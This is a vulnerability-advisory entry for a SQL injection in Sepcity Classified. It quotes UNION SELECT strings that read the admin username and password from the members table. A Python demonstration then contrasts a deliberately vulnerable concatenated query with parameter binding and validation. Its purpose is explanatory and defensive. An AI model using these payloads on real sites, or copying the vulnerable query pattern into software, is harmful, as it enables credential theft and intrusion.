Vendor: Classified
By: S.W.A.T.
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Classified
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
Sepcity Classified Remote SQL Injection Vulnerability
A vulnerability exists in Sepcity Classified which allows an attacker to view the admin username and password in plaintext. The username is read by appending 'union select 0,1,username,3 from members' to the URL, and the password by appending 'union select 0,1,password,3 from members'. The admin login page is located at http://site.com/[path]/admclassifieds.asp.
Mitigation:
Ensure that user input is properly sanitized and validated before being used in a SQL query.
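The mitigation above, shown as an added example (not code from the advisory or from the vendor): the concatenated query next to a validated, parameter-bound one, run against the two strings the advisory quotes. Assumptions: Python's sqlite3 stands in for the ASP application's database, the `ads` table, its columns, the `0 ` id prefix and the stored credential are constructed; only the `members` table and its `username`/`password` columns come from the advisory.

```python
import re
import sqlite3

# Constructed sample data: `ads` and its columns are hypothetical; `members`
# (username, password) is the table named in the advisory.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE ads (id INTEGER PRIMARY KEY, category INTEGER,
                          title TEXT, price INTEGER);
        CREATE TABLE members (username TEXT, password TEXT);
        INSERT INTO ads VALUES (1, 2, 'Used bicycle', 40);
        INSERT INTO members VALUES ('admin', 'constructed-secret');
    """)
    return db

QUERY = "SELECT id, category, title, price FROM ads WHERE id = "

def get_ad_vulnerable(db, ad_id):
    # "Before" form: the request value becomes part of the SQL text, so a
    # trailing UNION SELECT is parsed and executed as a second query.
    return db.execute(QUERY + ad_id).fetchall()

def get_ad_bound(db, ad_id):
    # Bound parameter: the value is sent as data and never parsed as SQL.
    return db.execute(QUERY + "?", (ad_id,)).fetchall()

def get_ad_safe(db, ad_id):
    # Validation plus binding: reject anything that is not a short decimal id.
    if not re.fullmatch(r"[0-9]{1,9}", ad_id):
        raise ValueError("ad id must be a decimal integer")
    return get_ad_bound(db, int(ad_id))

# The two strings quoted in the advisory, appended to a constructed id value.
USER_PROBE = "0 union select 0,1,username,3 from members"
PASS_PROBE = "0 union select 0,1,password,3 from members"

if __name__ == "__main__":
    db = make_db()
    print(get_ad_vulnerable(db, USER_PROBE))  # member data appears in the row
    print(get_ad_bound(db, USER_PROBE))       # no rows: value treated as data
    print(get_ad_safe(db, "1"))               # the legitimate ad
```

Binding alone already stops the UNION from being parsed; the validation step additionally rejects malformed ids before they reach the database.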